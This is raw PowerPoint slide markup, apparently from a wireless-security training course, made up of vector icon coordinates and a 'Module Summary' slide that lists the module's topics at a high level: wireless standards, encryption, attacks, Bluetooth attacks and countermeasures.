                      <a:pt x="125" y="50"/>
                      <a:pt x="125" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="50"/>
                      <a:pt x="125" y="50"/>
                      <a:pt x="125" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="48"/>
                      <a:pt x="124" y="47"/>
                      <a:pt x="123" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="34"/>
                      <a:pt x="131" y="34"/>
                      <a:pt x="131" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="26"/>
                      <a:pt x="121" y="20"/>
                      <a:pt x="121" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="25"/>
                      <a:pt x="110" y="25"/>
                      <a:pt x="110" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="25"/>
                      <a:pt x="110" y="25"/>
                      <a:pt x="110" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="24"/>
                      <a:pt x="107" y="23"/>
                      <a:pt x="106" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="9"/>
                      <a:pt x="106" y="9"/>
                      <a:pt x="106" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="4"/>
                      <a:pt x="89" y="2"/>
                      <a:pt x="89" y="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3"/>
                      <a:pt x="80" y="13"/>
                      <a:pt x="80" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="12"/>
                      <a:pt x="77" y="12"/>
                      <a:pt x="76" y="12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0" y="0"/>
                      <a:pt x="52" y="2"/>
                      <a:pt x="52" y="2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48" y="16"/>
                      <a:pt x="47" y="17"/>
                      <a:pt x="45" y="17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26" y="15"/>
                      <a:pt x="20" y="21"/>
                      <a:pt x="20" y="21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4" y="34"/>
                      <a:pt x="23" y="35"/>
                      <a:pt x="23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4" y="44"/>
                      <a:pt x="2" y="52"/>
                      <a:pt x="2" y="52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2" y="62"/>
                      <a:pt x="12" y="63"/>
                      <a:pt x="12" y="65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81"/>
                      <a:pt x="2" y="88"/>
                      <a:pt x="2" y="88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6" y="92"/>
                      <a:pt x="17" y="94"/>
                      <a:pt x="17" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="106"/>
                      <a:pt x="10" y="106"/>
                      <a:pt x="10" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="115"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="116"/>
                      <a:pt x="34" y="116"/>
                      <a:pt x="34" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="116"/>
                      <a:pt x="34" y="116"/>
                      <a:pt x="34" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="117"/>
                      <a:pt x="36" y="117"/>
                      <a:pt x="37" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="131"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="36" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="136"/>
                      <a:pt x="53" y="138"/>
                      <a:pt x="53" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="128"/>
                      <a:pt x="62" y="128"/>
                      <a:pt x="62" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="128"/>
                      <a:pt x="62" y="128"/>
                      <a:pt x="62" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="128"/>
                      <a:pt x="64" y="128"/>
                      <a:pt x="66" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="141"/>
                      <a:pt x="71" y="141"/>
                      <a:pt x="71" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="141"/>
                      <a:pt x="89" y="138"/>
                      <a:pt x="89" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="125"/>
                      <a:pt x="91" y="125"/>
                      <a:pt x="91" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="125"/>
                      <a:pt x="91" y="125"/>
                      <a:pt x="91" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="125"/>
                      <a:pt x="94" y="124"/>
                      <a:pt x="95" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="131"/>
                      <a:pt x="107" y="131"/>
                      <a:pt x="107" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="126"/>
                      <a:pt x="120" y="118"/>
                      <a:pt x="120" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="104"/>
                      <a:pt x="116" y="104"/>
                      <a:pt x="116" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="104"/>
                      <a:pt x="116" y="104"/>
                      <a:pt x="116" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="104"/>
                      <a:pt x="117" y="104"/>
                      <a:pt x="118" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="104"/>
                      <a:pt x="131" y="104"/>
                      <a:pt x="131" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="96"/>
                      <a:pt x="138" y="88"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="80"/>
                      <a:pt x="128" y="80"/>
                      <a:pt x="128" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="80"/>
                      <a:pt x="128" y="80"/>
                      <a:pt x="128" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="79"/>
                      <a:pt x="128" y="77"/>
                      <a:pt x="129" y="76"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="141" y="70"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="70" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="100"/>
                      <a:pt x="41" y="87"/>
                      <a:pt x="41" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="54"/>
                      <a:pt x="54" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="41"/>
                      <a:pt x="100" y="54"/>
                      <a:pt x="100" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="87"/>
                      <a:pt x="87" y="100"/>
                      <a:pt x="70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42" name="Freeform 128">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD86A4CE-A9C2-4DE7-BD0F-2C1DD7176E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67242" y="2313523"/>
                <a:ext cx="171079" cy="171079"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 92 w 94"/>
                  <a:gd name="T1" fmla="*/ 35 h 94"/>
                  <a:gd name="T2" fmla="*/ 83 w 94"/>
                  <a:gd name="T3" fmla="*/ 33 h 94"/>
                  <a:gd name="T4" fmla="*/ 87 w 94"/>
                  <a:gd name="T5" fmla="*/ 23 h 94"/>
                  <a:gd name="T6" fmla="*/ 71 w 94"/>
                  <a:gd name="T7" fmla="*/ 16 h 94"/>
                  <a:gd name="T8" fmla="*/ 69 w 94"/>
                  <a:gd name="T9" fmla="*/ 15 h 94"/>
                  <a:gd name="T10" fmla="*/ 58 w 94"/>
                  <a:gd name="T11" fmla="*/ 2 h 94"/>
                  <a:gd name="T12" fmla="*/ 51 w 94"/>
                  <a:gd name="T13" fmla="*/ 8 h 94"/>
                  <a:gd name="T14" fmla="*/ 46 w 94"/>
                  <a:gd name="T15" fmla="*/ 0 h 94"/>
                  <a:gd name="T16" fmla="*/ 33 w 94"/>
                  <a:gd name="T17" fmla="*/ 10 h 94"/>
                  <a:gd name="T18" fmla="*/ 30 w 94"/>
                  <a:gd name="T19" fmla="*/ 11 h 94"/>
                  <a:gd name="T20" fmla="*/ 13 w 94"/>
                  <a:gd name="T21" fmla="*/ 14 h 94"/>
                  <a:gd name="T22" fmla="*/ 16 w 94"/>
                  <a:gd name="T23" fmla="*/ 22 h 94"/>
                  <a:gd name="T24" fmla="*/ 6 w 94"/>
                  <a:gd name="T25" fmla="*/ 24 h 94"/>
                  <a:gd name="T26" fmla="*/ 8 w 94"/>
                  <a:gd name="T27" fmla="*/ 40 h 94"/>
                  <a:gd name="T28" fmla="*/ 8 w 94"/>
                  <a:gd name="T29" fmla="*/ 43 h 94"/>
                  <a:gd name="T30" fmla="*/ 1 w 94"/>
                  <a:gd name="T31" fmla="*/ 59 h 94"/>
                  <a:gd name="T32" fmla="*/ 10 w 94"/>
                  <a:gd name="T33" fmla="*/ 60 h 94"/>
                  <a:gd name="T34" fmla="*/ 7 w 94"/>
                  <a:gd name="T35" fmla="*/ 71 h 94"/>
                  <a:gd name="T36" fmla="*/ 15 w 94"/>
                  <a:gd name="T37" fmla="*/ 77 h 94"/>
                  <a:gd name="T38" fmla="*/ 19 w 94"/>
                  <a:gd name="T39" fmla="*/ 79 h 94"/>
                  <a:gd name="T40" fmla="*/ 34 w 94"/>
                  <a:gd name="T41" fmla="*/ 92 h 94"/>
                  <a:gd name="T42" fmla="*/ 43 w 94"/>
                  <a:gd name="T43" fmla="*/ 85 h 94"/>
                  <a:gd name="T44" fmla="*/ 48 w 94"/>
                  <a:gd name="T45" fmla="*/ 94 h 94"/>
                  <a:gd name="T46" fmla="*/ 61 w 94"/>
                  <a:gd name="T47" fmla="*/ 83 h 94"/>
                  <a:gd name="T48" fmla="*/ 63 w 94"/>
                  <a:gd name="T49" fmla="*/ 82 h 94"/>
                  <a:gd name="T50" fmla="*/ 80 w 94"/>
                  <a:gd name="T51" fmla="*/ 78 h 94"/>
                  <a:gd name="T52" fmla="*/ 77 w 94"/>
                  <a:gd name="T53" fmla="*/ 68 h 94"/>
                  <a:gd name="T54" fmla="*/ 87 w 94"/>
                  <a:gd name="T55" fmla="*/ 69 h 94"/>
                  <a:gd name="T56" fmla="*/ 85 w 94"/>
                  <a:gd name="T57" fmla="*/ 53 h 94"/>
                  <a:gd name="T58" fmla="*/ 86 w 94"/>
                  <a:gd name="T59" fmla="*/ 50 h 94"/>
                  <a:gd name="T60" fmla="*/ 47 w 94"/>
                  <a:gd name="T61" fmla="*/ 67 h 94"/>
                  <a:gd name="T62" fmla="*/ 47 w 94"/>
                  <a:gd name="T63" fmla="*/ 27 h 94"/>
                  <a:gd name="T64" fmla="*/ 47 w 94"/>
                  <a:gd name="T65" fmla="*/ 6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4" h="94">
                    <a:moveTo>
                      <a:pt x="94" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="40"/>
                      <a:pt x="92" y="35"/>
                      <a:pt x="92" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="33"/>
                      <a:pt x="83" y="33"/>
                      <a:pt x="83" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="33"/>
                      <a:pt x="83" y="33"/>
                      <a:pt x="83" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="32"/>
                      <a:pt x="83" y="31"/>
                      <a:pt x="82" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="23"/>
                      <a:pt x="87" y="23"/>
                      <a:pt x="87" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="17"/>
                      <a:pt x="80" y="13"/>
                      <a:pt x="80" y="13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0" y="15"/>
                      <a:pt x="69" y="15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64" y="3"/>
                      <a:pt x="58" y="2"/>
                      <a:pt x="58" y="2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0" y="8"/>
                      <a:pt x="49" y="8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39" y="0"/>
                      <a:pt x="34" y="1"/>
                      <a:pt x="34" y="1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2" y="11"/>
                      <a:pt x="31" y="11"/>
                      <a:pt x="30" y="11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17" y="10"/>
                      <a:pt x="13" y="14"/>
                      <a:pt x="13" y="14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3"/>
                      <a:pt x="15" y="23"/>
                      <a:pt x="15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3" y="29"/>
                      <a:pt x="1" y="34"/>
                      <a:pt x="1" y="34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1"/>
                      <a:pt x="8" y="42"/>
                      <a:pt x="8" y="4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54"/>
                      <a:pt x="1" y="59"/>
                      <a:pt x="1" y="59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0" y="60"/>
                      <a:pt x="10" y="60"/>
                      <a:pt x="10" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="61"/>
                      <a:pt x="11" y="62"/>
                      <a:pt x="11" y="63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10" y="77"/>
                      <a:pt x="10" y="80"/>
                      <a:pt x="10" y="80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5" y="78"/>
                      <a:pt x="19" y="78"/>
                      <a:pt x="19" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="87"/>
                      <a:pt x="19" y="87"/>
                      <a:pt x="19" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="91"/>
                      <a:pt x="34" y="92"/>
                      <a:pt x="34" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="85"/>
                      <a:pt x="43" y="85"/>
                      <a:pt x="43" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="85"/>
                      <a:pt x="43" y="85"/>
                      <a:pt x="43" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="85"/>
                      <a:pt x="44" y="86"/>
                      <a:pt x="45" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="94"/>
                      <a:pt x="48" y="94"/>
                      <a:pt x="48" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="94"/>
                      <a:pt x="59" y="92"/>
                      <a:pt x="59" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="83"/>
                      <a:pt x="61" y="83"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="83"/>
                      <a:pt x="61" y="83"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="83"/>
                      <a:pt x="62" y="83"/>
                      <a:pt x="63" y="82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77" y="84"/>
                      <a:pt x="80" y="78"/>
                      <a:pt x="80" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="68"/>
                      <a:pt x="77" y="68"/>
                      <a:pt x="77" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="68"/>
                      <a:pt x="77" y="68"/>
                      <a:pt x="77" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="68"/>
                      <a:pt x="78" y="68"/>
                      <a:pt x="78" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="69"/>
                      <a:pt x="87" y="69"/>
                      <a:pt x="87" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="64"/>
                      <a:pt x="92" y="59"/>
                      <a:pt x="92" y="59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5" y="52"/>
                      <a:pt x="85" y="51"/>
                      <a:pt x="86" y="50"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="94" y="46"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="47" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="67"/>
                      <a:pt x="27" y="58"/>
                      <a:pt x="27" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="36"/>
                      <a:pt x="36" y="27"/>
                      <a:pt x="47" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="27"/>
                      <a:pt x="67" y="36"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="58" y="67"/>
                      <a:pt x="47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08D9B083-4E4E-4625-B216-922DD98EEA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2457450" y="1143814"/>
            <a:ext cx="0" cy="668457"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="571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7662353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1F33BC-8F7F-47A8-BC7C-8800350C8929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926774" y="190553"/>
            <a:ext cx="4648200" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Module Summary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9EB584D4-F205-48B5-A335-0AD51A42BBA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="1154507"/>
            <a:ext cx="6804683" cy="67710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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>This module has discussed the wireless terminology, wireless networks, and wireless standards</a:t>
            </a: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363AB8AF-2242-4A92-93F9-B88CE94A6469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1237530"/>
            <a:ext cx="511063" cy="511063"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="50B6C1"/>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="3FA8B3"/>
            </a:solidFill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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern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33" name="Right Arrow 365">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C120A04-FA2C-43E1-9348-3248737CACED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532240" y="1372750"/>
            <a:ext cx="250885" cy="240625"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern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8F256DDF-AF19-4ADD-BD9E-48EE683F07C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="2159305"/>
            <a:ext cx="6504159" cy="3847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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>It has covered various types of wireless encryption</a:t>
            </a:r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924C6095-4869-4160-9A4E-0CE4313E0013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2096135"/>
            <a:ext cx="511063" cy="511063"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="50B6C1"/>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="3FA8B3"/>
            </a:solidFill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457200"/>
            <a:endParaRPr lang="en-US" sz="900" kern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36" name="Right Arrow 368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA595651-DB96-417C-8FFE-DDE8B924F4B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532240" y="2231355"/>
            <a:ext cx="250885" cy="240625"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern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18AE304E-C811-4207-8B4E-53177D5FCCF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="2871718"/>
            <a:ext cx="6808960" cy="67710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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>It also discussed wireless network-specific attack techniques and tools in detail</a:t>
            </a:r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A176D44B-B508-436B-9D97-50EC06D9F866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2954741"/>
            <a:ext cx="511063" cy="511063"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="50B6C1"/>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="3FA8B3"/>
            </a:solidFill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457200"/>
            <a:endParaRPr lang="en-US" sz="900" kern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38" name="Right Arrow 371">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7256E60F-85C2-4817-8546-B708AA4A3CD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532240" y="3089961"/>
            <a:ext cx="250885" cy="240625"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern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46AD529D-F3CC-49AC-A5EA-13499E6C61BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="3876516"/>
            <a:ext cx="5665959" cy="3847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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>This module also discussed various Bluetooth attacks</a:t>
            </a:r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ACB60122-32E8-414D-B285-2B4978C7E392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3813346"/>
            <a:ext cx="511063" cy="511063"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="50B6C1"/>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="3FA8B3"/>
            </a:solidFill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457200"/>
            <a:endParaRPr lang="en-US" sz="900" kern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40" name="Right Arrow 374">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88345A71-1135-40F4-8EA1-A0933F0DCA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532240" y="3948566"/>
            <a:ext cx="250885" cy="240625"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern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3B101B47-4D60-4AC6-8C18-455719EC0196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="5545946"/>
            <a:ext cx="6808960" cy="67710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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>In the next module, we will discuss in detail on various mobile attacks and countermeasures.</a:t>
            </a:r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119CB076-CBE4-42C2-83ED-1E710D1A4807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5628969"/>
            <a:ext cx="511063" cy="511063"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="50B6C1"/>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="3FA8B3"/>
            </a:solidFill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457200"/>
            <a:endParaRPr lang="en-US" sz="900" kern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42" name="Right Arrow 377">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1C97A2A-F2F3-4E86-B1DD-C5796E1AE9BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532240" y="5764189"/>
            <a:ext cx="250885" cy="240625"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:pr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457200">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" kern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67C26A32-14E8-4FB6-B2DA-7EEA5CAACFEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="4588929"/>
            <a:ext cx="6934199" cy="67710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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Finally, this module ended with a detailed discussion on various wireless attack countermeasures and wireless security tools</a:t>
            </a:r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7CFB7BCF-F92B-4A6C-966E-B13C17C7F420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385277" y="4671952"/>
            <a:ext cx="511063" cy="511063"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="50B6C1"/>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="3FA8B3"/>
            </a:solidFill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457200"/>
            <a:endParaRPr lang="en-US" sz="900" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Right Arrow 365">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE967952-B88B-4C0F-95DA-C960CB92DBEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536517" y="4807172"/>
            <a:ext cx="250885" cy="240625"/>
          </a:xfrm>
